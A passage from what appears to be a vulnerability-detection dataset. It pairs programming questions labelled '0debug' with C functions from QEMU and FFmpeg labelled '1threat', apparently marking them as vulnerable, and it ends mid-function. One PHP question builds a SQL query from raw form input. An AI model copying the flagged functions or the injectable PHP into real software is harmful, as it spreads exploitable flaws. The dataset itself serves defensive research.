problem
stringlengths 26
131k
| labels
class label 2
classes |
|---|---|
How to apply styles for nth childs inner div :
<!-- begin snippet: js hide: false console: true babel: false -->
<!-- language: lang-css -->
.outer:nth-child(3) > div{
color:red;
}
<!-- language: lang-html -->
<div class="outer">
<div>1st deep element</div>
<div>1st deep element</div>
<div>
<div>2nd deep element</div>
</div>
</div>
<!-- end snippet -->
how to control 2nd deep elements style only using outer class selector
| 0debug
|
Creating One Unique Array from 2 Arrays : I have 2 arrays(Arr1, Arr2). I am trying to create a single array that has as many objects in it as Arr.1.length where the format is:
[{name:Arr1[0], Arr2[0],Arr2[1]...etc}, {name:Arr1[1], Arr2[0],Arr2[1]...etc}..... etc]
Working with proprietary information so I cannot show the actual code. For the sake of Simplicity we will examine the two arrays:
Arr1[1,2,3,4,5] and
Arr2[6,7,8,9].
The resulting array should be:
[{1,6,7,8,9}{2,6,7,8,9}{3,6,7,8,9}{4,6,7,8,9}{5,6,7,8,9}]. I have used two for loops to manipulate two arrays. Did not know if there was a method to call that would make this easier.
| 0debug
|
Windows batch script to rename files that have random names? : <p>I need to make windows batch script to rename files that have random names. I have a folder with thousand .txt files, their names are completely random,
I want to rename first 5 files in that folder to <code>file1.txt, file2.txt,file3.txt, file4.txt,file5.txt</code>.</p>
<p>Help appreciated.</p>
| 0debug
|
static uint64_t virtio_net_get_features(VirtIODevice *vdev, uint64_t features,
Error **errp)
{
VirtIONet *n = VIRTIO_NET(vdev);
NetClientState *nc = qemu_get_queue(n->nic);
features |= n->host_features;
virtio_add_feature(&features, VIRTIO_NET_F_MAC);
if (!peer_has_vnet_hdr(n)) {
virtio_clear_feature(&features, VIRTIO_NET_F_CSUM);
virtio_clear_feature(&features, VIRTIO_NET_F_HOST_TSO4);
virtio_clear_feature(&features, VIRTIO_NET_F_HOST_TSO6);
virtio_clear_feature(&features, VIRTIO_NET_F_HOST_ECN);
virtio_clear_feature(&features, VIRTIO_NET_F_GUEST_CSUM);
virtio_clear_feature(&features, VIRTIO_NET_F_GUEST_TSO4);
virtio_clear_feature(&features, VIRTIO_NET_F_GUEST_TSO6);
virtio_clear_feature(&features, VIRTIO_NET_F_GUEST_ECN);
}
if (!peer_has_vnet_hdr(n) || !peer_has_ufo(n)) {
virtio_clear_feature(&features, VIRTIO_NET_F_GUEST_UFO);
virtio_clear_feature(&features, VIRTIO_NET_F_HOST_UFO);
}
if (!get_vhost_net(nc->peer)) {
return features;
}
return vhost_net_get_features(get_vhost_net(nc->peer), features);
}
| 1threat
|
static int blkdebug_co_flush(BlockDriverState *bs)
{
BDRVBlkdebugState *s = bs->opaque;
BlkdebugRule *rule = NULL;
QSIMPLEQ_FOREACH(rule, &s->active_rules, active_next) {
if (rule->options.inject.offset == -1) {
break;
}
}
if (rule && rule->options.inject.error) {
return inject_error(bs, rule);
}
return bdrv_co_flush(bs->file->bs);
}
| 1threat
|
Simple PHP error T_print error : <pre><code>include 'connect.php';
msql_select_db("u972015033_jobss"); or die("Could not find DB");
if(isset($_POST['search'])){
$searchq = $_POST['search'];
$query = msql_query("SELECT * FROM job_search WHERE job_name LIKE '%$searchq%'"); or die("Could not find");
$count = mysql_num_rows($query);
if($count == 0){
$output = 'There was no results found';
else{
while($row = mysql_fetch_array($query)){
$jobname = $row['job_name'];
$jobdesc = $row['job_desc'];
$jobcomp = $row['job_company'];
$output .= '<div> '.$jobname.' '.$jobdesc.' '.$jobcomp.'</div>';
echo = "$output";
}
}
}
}
</code></pre>
<p>I dont know what is the problem please help
Its a basic script to query a database and display
the output</p>
| 0debug
|
static void do_drive_backup(DriveBackup *backup, BlockJobTxn *txn, Error **errp)
{
BlockDriverState *bs;
BlockDriverState *target_bs;
BlockDriverState *source = NULL;
BdrvDirtyBitmap *bmap = NULL;
AioContext *aio_context;
QDict *options = NULL;
Error *local_err = NULL;
int flags;
int64_t size;
if (!backup->has_speed) {
backup->speed = 0;
}
if (!backup->has_on_source_error) {
backup->on_source_error = BLOCKDEV_ON_ERROR_REPORT;
}
if (!backup->has_on_target_error) {
backup->on_target_error = BLOCKDEV_ON_ERROR_REPORT;
}
if (!backup->has_mode) {
backup->mode = NEW_IMAGE_MODE_ABSOLUTE_PATHS;
}
if (!backup->has_job_id) {
backup->job_id = NULL;
}
bs = qmp_get_root_bs(backup->device, errp);
if (!bs) {
return;
}
aio_context = bdrv_get_aio_context(bs);
aio_context_acquire(aio_context);
if (!backup->has_format) {
backup->format = backup->mode == NEW_IMAGE_MODE_EXISTING ?
NULL : (char*) bs->drv->format_name;
}
if (bdrv_op_is_blocked(bs, BLOCK_OP_TYPE_BACKUP_SOURCE, errp)) {
goto out;
}
flags = bs->open_flags | BDRV_O_RDWR;
if (backup->sync == MIRROR_SYNC_MODE_TOP) {
source = backing_bs(bs);
if (!source) {
backup->sync = MIRROR_SYNC_MODE_FULL;
}
}
if (backup->sync == MIRROR_SYNC_MODE_NONE) {
source = bs;
}
size = bdrv_getlength(bs);
if (size < 0) {
error_setg_errno(errp, -size, "bdrv_getlength failed");
goto out;
}
if (backup->mode != NEW_IMAGE_MODE_EXISTING) {
assert(backup->format);
if (source) {
bdrv_img_create(backup->target, backup->format, source->filename,
source->drv->format_name, NULL,
size, flags, &local_err, false);
} else {
bdrv_img_create(backup->target, backup->format, NULL, NULL, NULL,
size, flags, &local_err, false);
}
}
if (local_err) {
error_propagate(errp, local_err);
goto out;
}
if (backup->format) {
options = qdict_new();
qdict_put(options, "driver", qstring_from_str(backup->format));
}
target_bs = bdrv_open(backup->target, NULL, options, flags, errp);
if (!target_bs) {
goto out;
}
bdrv_set_aio_context(target_bs, aio_context);
if (backup->has_bitmap) {
bmap = bdrv_find_dirty_bitmap(bs, backup->bitmap);
if (!bmap) {
error_setg(errp, "Bitmap '%s' could not be found", backup->bitmap);
bdrv_unref(target_bs);
goto out;
}
}
backup_start(backup->job_id, bs, target_bs, backup->speed, backup->sync,
bmap, backup->on_source_error, backup->on_target_error,
block_job_cb, bs, txn, &local_err);
bdrv_unref(target_bs);
if (local_err != NULL) {
error_propagate(errp, local_err);
goto out;
}
out:
aio_context_release(aio_context);
}
| 1threat
|
How to set a form as pristine? : <ul>
<li>The form that represents entity state is being edited (turns dirty)</li>
<li>The form is being submitted and entity state is now aligned with the form state which means that the form should now be set as pristine.</li>
</ul>
<p>How do we do that?
There was <code>$setPristine()</code> in ng1.
Btw, I'm talking about <code>ControlGroup</code> type of form.</p>
| 0debug
|
Create single row python pandas dataframe : <p>I want to create a python pandas DataFrame with a single row, to use further pandas functionality like dumping to *.csv.</p>
<p>I have seen code like the following being used, but I only end up with the column structure, but empty data</p>
<pre><code>import pandas as pd
df = pd.DataFrame()
df['A'] = 1
df['B'] = 1.23
df['C'] = "Hello"
df.columns = [['A','B','C']]
print df
Empty DataFrame
Columns: [A, B, C]
Index: []
</code></pre>
<p>While I know there are other ways to do it (like from a dictionary), I want to understand why this piece of code is not working for me!? Is this a version issue? (using pandas==0.19.2)</p>
| 0debug
|
PPC_OP(check_reservation)
{
if ((uint32_t)env->reserve == (uint32_t)(T0 & ~0x00000003))
env->reserve = -1;
RETURN();
}
| 1threat
|
vmstate_get_subsection(const VMStateSubsection *sub, char *idstr)
{
while (sub && sub->needed) {
if (strcmp(idstr, sub->vmsd->name) == 0) {
return sub->vmsd;
}
sub++;
}
return NULL;
}
| 1threat
|
Repairing a PNG file : <p>I have been trying to work with this file. It is supposed to have some kind of image but I can't get it out. From text editor I noticed this is png file but for me it is .zip ... Could somebody help me with converting this to something I understand? Even a hint is okay. </p>
<p><a href="https://drive.google.com/file/d/0B_vZ8VW448TnWS0wajRVbGd5cEU/view?usp=sharing" rel="nofollow" title="Here is the file">Here is the file I am talking about</a></p>
| 0debug
|
int ff_h264_decode_slice_header(H264Context *h, H264SliceContext *sl, H264Context *h0)
{
unsigned int first_mb_in_slice;
unsigned int pps_id;
int ret;
unsigned int slice_type, tmp, i, j;
int default_ref_list_done = 0;
int last_pic_structure, last_pic_droppable;
int needs_reinit = 0;
int field_pic_flag, bottom_field_flag;
h->qpel_put = h->h264qpel.put_h264_qpel_pixels_tab;
h->qpel_avg = h->h264qpel.avg_h264_qpel_pixels_tab;
first_mb_in_slice = get_ue_golomb(&h->gb);
if (first_mb_in_slice == 0) {
if (h0->current_slice && h->cur_pic_ptr && FIELD_PICTURE(h)) {
ff_h264_field_end(h, sl, 1);
}
h0->current_slice = 0;
if (!h0->first_field) {
if (h->cur_pic_ptr && !h->droppable) {
ff_thread_report_progress(&h->cur_pic_ptr->tf, INT_MAX,
h->picture_structure == PICT_BOTTOM_FIELD);
}
h->cur_pic_ptr = NULL;
}
}
slice_type = get_ue_golomb_31(&h->gb);
if (slice_type > 9) {
av_log(h->avctx, AV_LOG_ERROR,
"slice type %d too large at %d %d\n",
slice_type, h->mb_x, h->mb_y);
return AVERROR_INVALIDDATA;
}
if (slice_type > 4) {
slice_type -= 5;
sl->slice_type_fixed = 1;
} else
sl->slice_type_fixed = 0;
slice_type = golomb_to_pict_type[slice_type];
if (slice_type == AV_PICTURE_TYPE_I ||
(h0->current_slice != 0 && slice_type == h0->last_slice_type)) {
default_ref_list_done = 1;
}
sl->slice_type = slice_type;
sl->slice_type_nos = slice_type & 3;
if (h->nal_unit_type == NAL_IDR_SLICE &&
sl->slice_type_nos != AV_PICTURE_TYPE_I) {
av_log(h->avctx, AV_LOG_ERROR, "A non-intra slice in an IDR NAL unit.\n");
return AVERROR_INVALIDDATA;
}
h->pict_type = sl->slice_type;
pps_id = get_ue_golomb(&h->gb);
if (pps_id >= MAX_PPS_COUNT) {
av_log(h->avctx, AV_LOG_ERROR, "pps_id %u out of range\n", pps_id);
return AVERROR_INVALIDDATA;
}
if (!h0->pps_buffers[pps_id]) {
av_log(h->avctx, AV_LOG_ERROR,
"non-existing PPS %u referenced\n",
pps_id);
return AVERROR_INVALIDDATA;
}
h->pps = *h0->pps_buffers[pps_id];
if (!h0->sps_buffers[h->pps.sps_id]) {
av_log(h->avctx, AV_LOG_ERROR,
"non-existing SPS %u referenced\n",
h->pps.sps_id);
return AVERROR_INVALIDDATA;
}
if (h->pps.sps_id != h->sps.sps_id ||
h0->sps_buffers[h->pps.sps_id]->new) {
h0->sps_buffers[h->pps.sps_id]->new = 0;
h->sps = *h0->sps_buffers[h->pps.sps_id];
if (h->bit_depth_luma != h->sps.bit_depth_luma ||
h->chroma_format_idc != h->sps.chroma_format_idc) {
h->bit_depth_luma = h->sps.bit_depth_luma;
h->chroma_format_idc = h->sps.chroma_format_idc;
needs_reinit = 1;
}
if ((ret = ff_h264_set_parameter_from_sps(h)) < 0)
return ret;
}
h->avctx->profile = ff_h264_get_profile(&h->sps);
h->avctx->level = h->sps.level_idc;
h->avctx->refs = h->sps.ref_frame_count;
if (h->mb_width != h->sps.mb_width ||
h->mb_height != h->sps.mb_height * (2 - h->sps.frame_mbs_only_flag))
needs_reinit = 1;
h->mb_width = h->sps.mb_width;
h->mb_height = h->sps.mb_height * (2 - h->sps.frame_mbs_only_flag);
h->mb_num = h->mb_width * h->mb_height;
h->mb_stride = h->mb_width + 1;
h->b_stride = h->mb_width * 4;
h->chroma_y_shift = h->sps.chroma_format_idc <= 1;
h->width = 16 * h->mb_width;
h->height = 16 * h->mb_height;
ret = init_dimensions(h);
if (ret < 0)
return ret;
if (h->sps.video_signal_type_present_flag) {
h->avctx->color_range = h->sps.full_range ? AVCOL_RANGE_JPEG
: AVCOL_RANGE_MPEG;
if (h->sps.colour_description_present_flag) {
if (h->avctx->colorspace != h->sps.colorspace)
needs_reinit = 1;
h->avctx->color_primaries = h->sps.color_primaries;
h->avctx->color_trc = h->sps.color_trc;
h->avctx->colorspace = h->sps.colorspace;
}
}
if (h->context_initialized && needs_reinit) {
if (h != h0) {
av_log(h->avctx, AV_LOG_ERROR,
"changing width %d -> %d / height %d -> %d on "
"slice %d\n",
h->width, h->avctx->coded_width,
h->height, h->avctx->coded_height,
h0->current_slice + 1);
return AVERROR_INVALIDDATA;
}
ff_h264_flush_change(h);
if ((ret = get_pixel_format(h)) < 0)
return ret;
h->avctx->pix_fmt = ret;
av_log(h->avctx, AV_LOG_INFO, "Reinit context to %dx%d, "
"pix_fmt: %d\n", h->width, h->height, h->avctx->pix_fmt);
if ((ret = h264_slice_header_init(h, 1)) < 0) {
av_log(h->avctx, AV_LOG_ERROR,
"h264_slice_header_init() failed\n");
return ret;
}
}
if (!h->context_initialized) {
if (h != h0) {
av_log(h->avctx, AV_LOG_ERROR,
"Cannot (re-)initialize context during parallel decoding.\n");
return AVERROR_PATCHWELCOME;
}
if ((ret = get_pixel_format(h)) < 0)
return ret;
h->avctx->pix_fmt = ret;
if ((ret = h264_slice_header_init(h, 0)) < 0) {
av_log(h->avctx, AV_LOG_ERROR,
"h264_slice_header_init() failed\n");
return ret;
}
}
if (h == h0 && h->dequant_coeff_pps != pps_id) {
h->dequant_coeff_pps = pps_id;
h264_init_dequant_tables(h);
}
h->frame_num = get_bits(&h->gb, h->sps.log2_max_frame_num);
h->mb_mbaff = 0;
h->mb_aff_frame = 0;
last_pic_structure = h0->picture_structure;
last_pic_droppable = h0->droppable;
h->droppable = h->nal_ref_idc == 0;
if (h->sps.frame_mbs_only_flag) {
h->picture_structure = PICT_FRAME;
} else {
field_pic_flag = get_bits1(&h->gb);
if (field_pic_flag) {
bottom_field_flag = get_bits1(&h->gb);
h->picture_structure = PICT_TOP_FIELD + bottom_field_flag;
} else {
h->picture_structure = PICT_FRAME;
h->mb_aff_frame = h->sps.mb_aff;
}
}
h->mb_field_decoding_flag = h->picture_structure != PICT_FRAME;
if (h0->current_slice != 0) {
if (last_pic_structure != h->picture_structure ||
last_pic_droppable != h->droppable) {
av_log(h->avctx, AV_LOG_ERROR,
"Changing field mode (%d -> %d) between slices is not allowed\n",
last_pic_structure, h->picture_structure);
h->picture_structure = last_pic_structure;
h->droppable = last_pic_droppable;
return AVERROR_INVALIDDATA;
} else if (!h0->cur_pic_ptr) {
av_log(h->avctx, AV_LOG_ERROR,
"unset cur_pic_ptr on slice %d\n",
h0->current_slice + 1);
return AVERROR_INVALIDDATA;
}
} else {
if (h->frame_num != h->prev_frame_num) {
int unwrap_prev_frame_num = h->prev_frame_num;
int max_frame_num = 1 << h->sps.log2_max_frame_num;
if (unwrap_prev_frame_num > h->frame_num)
unwrap_prev_frame_num -= max_frame_num;
if ((h->frame_num - unwrap_prev_frame_num) > h->sps.ref_frame_count) {
unwrap_prev_frame_num = (h->frame_num - h->sps.ref_frame_count) - 1;
if (unwrap_prev_frame_num < 0)
unwrap_prev_frame_num += max_frame_num;
h->prev_frame_num = unwrap_prev_frame_num;
}
}
if (h0->first_field) {
assert(h0->cur_pic_ptr);
assert(h0->cur_pic_ptr->f.buf[0]);
assert(h0->cur_pic_ptr->reference != DELAYED_PIC_REF);
if (!FIELD_PICTURE(h) || h->picture_structure == last_pic_structure) {
if (!last_pic_droppable && last_pic_structure != PICT_FRAME) {
ff_thread_report_progress(&h0->cur_pic_ptr->tf, INT_MAX,
last_pic_structure == PICT_TOP_FIELD);
}
} else {
if (h0->cur_pic_ptr->frame_num != h->frame_num) {
if (!last_pic_droppable && last_pic_structure != PICT_FRAME) {
ff_thread_report_progress(&h0->cur_pic_ptr->tf, INT_MAX,
last_pic_structure == PICT_TOP_FIELD);
}
} else {
if (!((last_pic_structure == PICT_TOP_FIELD &&
h->picture_structure == PICT_BOTTOM_FIELD) ||
(last_pic_structure == PICT_BOTTOM_FIELD &&
h->picture_structure == PICT_TOP_FIELD))) {
av_log(h->avctx, AV_LOG_ERROR,
"Invalid field mode combination %d/%d\n",
last_pic_structure, h->picture_structure);
h->picture_structure = last_pic_structure;
h->droppable = last_pic_droppable;
return AVERROR_INVALIDDATA;
} else if (last_pic_droppable != h->droppable) {
avpriv_request_sample(h->avctx,
"Found reference and non-reference fields in the same frame, which");
h->picture_structure = last_pic_structure;
h->droppable = last_pic_droppable;
return AVERROR_PATCHWELCOME;
}
}
}
}
while (h->frame_num != h->prev_frame_num &&
h->frame_num != (h->prev_frame_num + 1) % (1 << h->sps.log2_max_frame_num)) {
H264Picture *prev = h->short_ref_count ? h->short_ref[0] : NULL;
av_log(h->avctx, AV_LOG_DEBUG, "Frame num gap %d %d\n",
h->frame_num, h->prev_frame_num);
ret = h264_frame_start(h);
if (ret < 0) {
h0->first_field = 0;
return ret;
}
h->prev_frame_num++;
h->prev_frame_num %= 1 << h->sps.log2_max_frame_num;
h->cur_pic_ptr->frame_num = h->prev_frame_num;
ff_thread_report_progress(&h->cur_pic_ptr->tf, INT_MAX, 0);
ff_thread_report_progress(&h->cur_pic_ptr->tf, INT_MAX, 1);
ret = ff_generate_sliding_window_mmcos(h, 1);
if (ret < 0 && (h->avctx->err_recognition & AV_EF_EXPLODE))
return ret;
ret = ff_h264_execute_ref_pic_marking(h, h->mmco, h->mmco_index);
if (ret < 0 && (h->avctx->err_recognition & AV_EF_EXPLODE))
return ret;
if (h->short_ref_count) {
if (prev) {
av_image_copy(h->short_ref[0]->f.data,
h->short_ref[0]->f.linesize,
(const uint8_t **)prev->f.data,
prev->f.linesize,
h->avctx->pix_fmt,
h->mb_width * 16,
h->mb_height * 16);
h->short_ref[0]->poc = prev->poc + 2;
}
h->short_ref[0]->frame_num = h->prev_frame_num;
}
}
if (h0->first_field) {
assert(h0->cur_pic_ptr);
assert(h0->cur_pic_ptr->f.buf[0]);
assert(h0->cur_pic_ptr->reference != DELAYED_PIC_REF);
if (!FIELD_PICTURE(h) || h->picture_structure == last_pic_structure) {
h0->cur_pic_ptr = NULL;
h0->first_field = FIELD_PICTURE(h);
} else {
if (h0->cur_pic_ptr->frame_num != h->frame_num) {
h0->first_field = 1;
h0->cur_pic_ptr = NULL;
} else {
h0->first_field = 0;
}
}
} else {
h0->first_field = FIELD_PICTURE(h);
}
if (!FIELD_PICTURE(h) || h0->first_field) {
if (h264_frame_start(h) < 0) {
h0->first_field = 0;
return AVERROR_INVALIDDATA;
}
} else {
release_unused_pictures(h, 0);
}
}
if (h != h0 && (ret = clone_slice(h, h0)) < 0)
return ret;
h->cur_pic_ptr->frame_num = h->frame_num;
assert(h->mb_num == h->mb_width * h->mb_height);
if (first_mb_in_slice << FIELD_OR_MBAFF_PICTURE(h) >= h->mb_num ||
first_mb_in_slice >= h->mb_num) {
av_log(h->avctx, AV_LOG_ERROR, "first_mb_in_slice overflow\n");
return AVERROR_INVALIDDATA;
}
h->resync_mb_x = h->mb_x = first_mb_in_slice % h->mb_width;
h->resync_mb_y = h->mb_y = (first_mb_in_slice / h->mb_width) <<
FIELD_OR_MBAFF_PICTURE(h);
if (h->picture_structure == PICT_BOTTOM_FIELD)
h->resync_mb_y = h->mb_y = h->mb_y + 1;
assert(h->mb_y < h->mb_height);
if (h->picture_structure == PICT_FRAME) {
h->curr_pic_num = h->frame_num;
h->max_pic_num = 1 << h->sps.log2_max_frame_num;
} else {
h->curr_pic_num = 2 * h->frame_num + 1;
h->max_pic_num = 1 << (h->sps.log2_max_frame_num + 1);
}
if (h->nal_unit_type == NAL_IDR_SLICE)
get_ue_golomb(&h->gb);
if (h->sps.poc_type == 0) {
h->poc_lsb = get_bits(&h->gb, h->sps.log2_max_poc_lsb);
if (h->pps.pic_order_present == 1 && h->picture_structure == PICT_FRAME)
h->delta_poc_bottom = get_se_golomb(&h->gb);
}
if (h->sps.poc_type == 1 && !h->sps.delta_pic_order_always_zero_flag) {
h->delta_poc[0] = get_se_golomb(&h->gb);
if (h->pps.pic_order_present == 1 && h->picture_structure == PICT_FRAME)
h->delta_poc[1] = get_se_golomb(&h->gb);
}
ff_init_poc(h, h->cur_pic_ptr->field_poc, &h->cur_pic_ptr->poc);
if (h->pps.redundant_pic_cnt_present)
h->redundant_pic_count = get_ue_golomb(&h->gb);
ret = ff_set_ref_count(h, sl);
if (ret < 0)
return ret;
else if (ret == 1)
default_ref_list_done = 0;
if (!default_ref_list_done)
ff_h264_fill_default_ref_list(h, sl);
if (sl->slice_type_nos != AV_PICTURE_TYPE_I) {
ret = ff_h264_decode_ref_pic_list_reordering(h, sl);
if (ret < 0) {
sl->ref_count[1] = sl->ref_count[0] = 0;
return ret;
}
}
if ((h->pps.weighted_pred && sl->slice_type_nos == AV_PICTURE_TYPE_P) ||
(h->pps.weighted_bipred_idc == 1 &&
sl->slice_type_nos == AV_PICTURE_TYPE_B))
ff_pred_weight_table(h, sl);
else if (h->pps.weighted_bipred_idc == 2 &&
sl->slice_type_nos == AV_PICTURE_TYPE_B) {
implicit_weight_table(h, sl, -1);
} else {
sl->use_weight = 0;
for (i = 0; i < 2; i++) {
sl->luma_weight_flag[i] = 0;
sl->chroma_weight_flag[i] = 0;
}
}
if (h->nal_ref_idc) {
ret = ff_h264_decode_ref_pic_marking(h0, &h->gb,
!(h->avctx->active_thread_type & FF_THREAD_FRAME) ||
h0->current_slice == 0);
if (ret < 0 && (h->avctx->err_recognition & AV_EF_EXPLODE))
return AVERROR_INVALIDDATA;
}
if (FRAME_MBAFF(h)) {
ff_h264_fill_mbaff_ref_list(h, sl);
if (h->pps.weighted_bipred_idc == 2 && sl->slice_type_nos == AV_PICTURE_TYPE_B) {
implicit_weight_table(h, sl, 0);
implicit_weight_table(h, sl, 1);
}
}
if (sl->slice_type_nos == AV_PICTURE_TYPE_B && !sl->direct_spatial_mv_pred)
ff_h264_direct_dist_scale_factor(h, sl);
ff_h264_direct_ref_list_init(h, sl);
if (sl->slice_type_nos != AV_PICTURE_TYPE_I && h->pps.cabac) {
tmp = get_ue_golomb_31(&h->gb);
if (tmp > 2) {
av_log(h->avctx, AV_LOG_ERROR, "cabac_init_idc %u overflow\n", tmp);
return AVERROR_INVALIDDATA;
}
h->cabac_init_idc = tmp;
}
sl->last_qscale_diff = 0;
tmp = h->pps.init_qp + get_se_golomb(&h->gb);
if (tmp > 51 + 6 * (h->sps.bit_depth_luma - 8)) {
av_log(h->avctx, AV_LOG_ERROR, "QP %u out of range\n", tmp);
return AVERROR_INVALIDDATA;
}
sl->qscale = tmp;
sl->chroma_qp[0] = get_chroma_qp(h, 0, sl->qscale);
sl->chroma_qp[1] = get_chroma_qp(h, 1, sl->qscale);
if (sl->slice_type == AV_PICTURE_TYPE_SP)
get_bits1(&h->gb);
if (sl->slice_type == AV_PICTURE_TYPE_SP ||
sl->slice_type == AV_PICTURE_TYPE_SI)
get_se_golomb(&h->gb);
h->deblocking_filter = 1;
h->slice_alpha_c0_offset = 0;
h->slice_beta_offset = 0;
if (h->pps.deblocking_filter_parameters_present) {
tmp = get_ue_golomb_31(&h->gb);
if (tmp > 2) {
av_log(h->avctx, AV_LOG_ERROR,
"deblocking_filter_idc %u out of range\n", tmp);
return AVERROR_INVALIDDATA;
}
h->deblocking_filter = tmp;
if (h->deblocking_filter < 2)
h->deblocking_filter ^= 1;
if (h->deblocking_filter) {
h->slice_alpha_c0_offset = get_se_golomb(&h->gb) * 2;
h->slice_beta_offset = get_se_golomb(&h->gb) * 2;
if (h->slice_alpha_c0_offset > 12 ||
h->slice_alpha_c0_offset < -12 ||
h->slice_beta_offset > 12 ||
h->slice_beta_offset < -12) {
av_log(h->avctx, AV_LOG_ERROR,
"deblocking filter parameters %d %d out of range\n",
h->slice_alpha_c0_offset, h->slice_beta_offset);
return AVERROR_INVALIDDATA;
}
}
}
if (h->avctx->skip_loop_filter >= AVDISCARD_ALL ||
(h->avctx->skip_loop_filter >= AVDISCARD_NONKEY &&
sl->slice_type_nos != AV_PICTURE_TYPE_I) ||
(h->avctx->skip_loop_filter >= AVDISCARD_BIDIR &&
sl->slice_type_nos == AV_PICTURE_TYPE_B) ||
(h->avctx->skip_loop_filter >= AVDISCARD_NONREF &&
h->nal_ref_idc == 0))
h->deblocking_filter = 0;
if (h->deblocking_filter == 1 && h0->max_contexts > 1) {
if (h->avctx->flags2 & CODEC_FLAG2_FAST) {
h->deblocking_filter = 2;
} else {
h0->max_contexts = 1;
if (!h0->single_decode_warning) {
av_log(h->avctx, AV_LOG_INFO,
"Cannot parallelize deblocking type 1, decoding such frames in sequential order\n");
h0->single_decode_warning = 1;
}
if (h != h0) {
av_log(h->avctx, AV_LOG_ERROR,
"Deblocking switched inside frame.\n");
return 1;
}
}
}
sl->qp_thresh = 15 -
FFMIN(h->slice_alpha_c0_offset, h->slice_beta_offset) -
FFMAX3(0,
h->pps.chroma_qp_index_offset[0],
h->pps.chroma_qp_index_offset[1]) +
6 * (h->sps.bit_depth_luma - 8);
h0->last_slice_type = slice_type;
sl->slice_num = ++h0->current_slice;
if (sl->slice_num >= MAX_SLICES) {
av_log(h->avctx, AV_LOG_ERROR,
"Too many slices, increase MAX_SLICES and recompile\n");
}
for (j = 0; j < 2; j++) {
int id_list[16];
int *ref2frm = sl->ref2frm[sl->slice_num & (MAX_SLICES - 1)][j];
for (i = 0; i < 16; i++) {
id_list[i] = 60;
if (j < sl->list_count && i < sl->ref_count[j] &&
sl->ref_list[j][i].f.buf[0]) {
int k;
AVBuffer *buf = sl->ref_list[j][i].f.buf[0]->buffer;
for (k = 0; k < h->short_ref_count; k++)
if (h->short_ref[k]->f.buf[0]->buffer == buf) {
id_list[i] = k;
break;
}
for (k = 0; k < h->long_ref_count; k++)
if (h->long_ref[k] && h->long_ref[k]->f.buf[0]->buffer == buf) {
id_list[i] = h->short_ref_count + k;
break;
}
}
}
ref2frm[0] =
ref2frm[1] = -1;
for (i = 0; i < 16; i++)
ref2frm[i + 2] = 4 * id_list[i] + (sl->ref_list[j][i].reference & 3);
ref2frm[18 + 0] =
ref2frm[18 + 1] = -1;
for (i = 16; i < 48; i++)
ref2frm[i + 4] = 4 * id_list[(i - 16) >> 1] +
(sl->ref_list[j][i].reference & 3);
}
if (h->avctx->debug & FF_DEBUG_PICT_INFO) {
av_log(h->avctx, AV_LOG_DEBUG,
"slice:%d %s mb:%d %c%s%s pps:%u frame:%d poc:%d/%d ref:%d/%d qp:%d loop:%d:%d:%d weight:%d%s %s\n",
sl->slice_num,
(h->picture_structure == PICT_FRAME ? "F" : h->picture_structure == PICT_TOP_FIELD ? "T" : "B"),
first_mb_in_slice,
av_get_picture_type_char(sl->slice_type),
sl->slice_type_fixed ? " fix" : "",
h->nal_unit_type == NAL_IDR_SLICE ? " IDR" : "",
pps_id, h->frame_num,
h->cur_pic_ptr->field_poc[0],
h->cur_pic_ptr->field_poc[1],
sl->ref_count[0], sl->ref_count[1],
sl->qscale,
h->deblocking_filter,
h->slice_alpha_c0_offset, h->slice_beta_offset,
sl->use_weight,
sl->use_weight == 1 && sl->use_weight_chroma ? "c" : "",
sl->slice_type == AV_PICTURE_TYPE_B ? (sl->direct_spatial_mv_pred ? "SPAT" : "TEMP") : "");
}
return 0;
}
| 1threat
|
How would you handle getting new data from the server? : <p>Say you have an application that access a server? How would you handle getting new data from the server? </p>
| 0debug
|
How can I write condition in Php if $x=0 then $y=$z : **How can I write condition in Php**
**if $x=0 then $y=$z**
| 0debug
|
static void vfio_msi_enable(VFIOPCIDevice *vdev)
{
int ret, i;
vfio_disable_interrupts(vdev);
vdev->nr_vectors = msi_nr_vectors_allocated(&vdev->pdev);
retry:
vdev->msi_vectors = g_malloc0(vdev->nr_vectors * sizeof(VFIOMSIVector));
for (i = 0; i < vdev->nr_vectors; i++) {
VFIOMSIVector *vector = &vdev->msi_vectors[i];
MSIMessage msg = msi_get_message(&vdev->pdev, i);
vector->vdev = vdev;
vector->virq = -1;
vector->use = true;
if (event_notifier_init(&vector->interrupt, 0)) {
error_report("vfio: Error: event_notifier_init failed");
}
qemu_set_fd_handler(event_notifier_get_fd(&vector->interrupt),
vfio_msi_interrupt, NULL, vector);
vfio_add_kvm_msi_virq(vdev, vector, &msg, false);
}
vdev->interrupt = VFIO_INT_MSI;
ret = vfio_enable_vectors(vdev, false);
if (ret) {
if (ret < 0) {
error_report("vfio: Error: Failed to setup MSI fds: %m");
} else if (ret != vdev->nr_vectors) {
error_report("vfio: Error: Failed to enable %d "
"MSI vectors, retry with %d", vdev->nr_vectors, ret);
}
for (i = 0; i < vdev->nr_vectors; i++) {
VFIOMSIVector *vector = &vdev->msi_vectors[i];
if (vector->virq >= 0) {
vfio_remove_kvm_msi_virq(vector);
}
qemu_set_fd_handler(event_notifier_get_fd(&vector->interrupt),
NULL, NULL, NULL);
event_notifier_cleanup(&vector->interrupt);
}
g_free(vdev->msi_vectors);
if (ret > 0 && ret != vdev->nr_vectors) {
vdev->nr_vectors = ret;
goto retry;
}
vdev->nr_vectors = 0;
error_report("vfio: Error: Failed to enable MSI");
vdev->interrupt = VFIO_INT_NONE;
return;
}
trace_vfio_msi_enable(vdev->vbasedev.name, vdev->nr_vectors);
}
| 1threat
|
static void dnxhd_decode_dct_block(DNXHDContext *ctx, DCTELEM *block, int n, int qscale)
{
int i, j, index, index2;
int level, component, sign;
const uint8_t *weigth_matrix;
if (n&2) {
component = 1 + (n&1);
weigth_matrix = ctx->cid_table->chroma_weigth;
} else {
component = 0;
weigth_matrix = ctx->cid_table->luma_weigth;
}
ctx->last_dc[component] += dnxhd_decode_dc(ctx);
block[0] = ctx->last_dc[component];
for (i = 1; ; i++) {
index = get_vlc2(&ctx->gb, ctx->ac_vlc.table, DNXHD_VLC_BITS, 2);
level = ctx->cid_table->ac_level[index];
if (!level) {
return;
}
sign = get_sbits(&ctx->gb, 1);
if (ctx->cid_table->ac_index_flag[index]) {
level += get_bits(&ctx->gb, ctx->cid_table->index_bits)<<6;
}
if (ctx->cid_table->ac_run_flag[index]) {
index2 = get_vlc2(&ctx->gb, ctx->run_vlc.table, DNXHD_VLC_BITS, 2);
i += ctx->cid_table->run[index2];
}
j = ctx->scantable.permutated[i];
